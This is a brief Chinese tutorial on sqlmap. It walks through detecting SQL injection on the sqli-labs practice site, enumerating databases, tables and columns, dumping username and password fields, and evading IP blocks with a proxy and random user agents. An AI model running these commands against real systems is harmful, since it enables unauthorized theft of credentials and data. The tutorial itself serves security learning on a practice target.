sqlmap基本使用
Mysql数据库
1、先检测是否可以注入,先判断是否可以正常注入:
sqlmap -u url -v 3
里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题
对于某些今天url可以在/a/b.html尝试加入号来进行此路径内的检测
2、爆库
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 –dbs –batch
3、根据爆出来的库查表
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” –tables –batch
4、根据表查字段
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” –columns –batch
5、根据字段查值
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” -C “username,password” –dump –batch
防止被IP拦截的操作,random-agent让请求头随机:
可以在后面增加–proxy http://127.0.0.1:8080 –random-agent -v 3
Access
对于Access数据库,直接报表就OK
sqlmap -u “http://192.168.96.16/shownews.asp?id=23” –tables
sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库
sqlmapdatatxt
[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]